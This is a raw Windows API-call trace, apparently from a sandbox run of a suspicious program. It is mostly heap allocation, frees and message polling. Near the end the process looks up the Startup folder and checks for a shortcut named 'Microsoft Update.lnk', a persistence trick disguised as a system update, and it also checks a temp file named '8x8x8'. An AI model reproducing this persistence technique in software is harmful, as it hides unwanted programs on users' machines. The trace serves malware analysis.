1 [0257.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0257.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0257.507] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0257.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865d30 [0257.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0257.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0257.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0257.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0257.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0257.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0257.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0257.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0257.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0257.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0257.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0257.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0257.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0257.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0257.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0257.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0257.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0257.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0257.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0257.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0257.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0257.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0257.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0257.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0257.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0257.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0257.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0257.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0257.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0257.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0257.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0257.634] FreeLibrary (hLibModule=0x76240000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0257.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0257.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865b08 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0257.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0257.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865d30 | out: hHeap=0x2af0000) returned 1 [0257.636] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0257.636] TranslateMessage (lpMsg=0x8cf708) returned 0 [0257.636] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0257.636] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0257.636] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0257.636] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0257.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0257.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0257.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0257.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0257.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865b08 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0257.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0257.639] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0257.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0257.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0257.640] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0257.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0257.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0257.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0257.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0257.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0257.641] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0257.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0257.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0257.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0257.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0257.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0257.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0257.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0257.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0257.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0257.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0257.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0257.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0257.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0257.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0257.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0257.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0257.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0257.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0257.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0257.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0257.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0257.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0257.646] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0257.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0257.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0257.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0257.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0257.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0257.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0257.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0257.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0257.771] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0257.772] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0257.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0257.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0257.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0257.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0257.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0257.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0257.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0257.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0257.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0257.774] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0257.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0257.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0257.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0257.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0257.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0257.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0257.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0257.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0257.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0257.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0257.775] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0257.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0257.775] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0257.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0257.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0257.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0257.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0257.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0257.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0257.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0257.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0257.776] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0257.881] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0257.882] timeGetTime () returned 0x11804bc [0257.883] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0257.883] Sleep (dwMilliseconds=0xa) [0257.961] timeGetTime () returned 0x118050a [0257.961] PeekMessageW 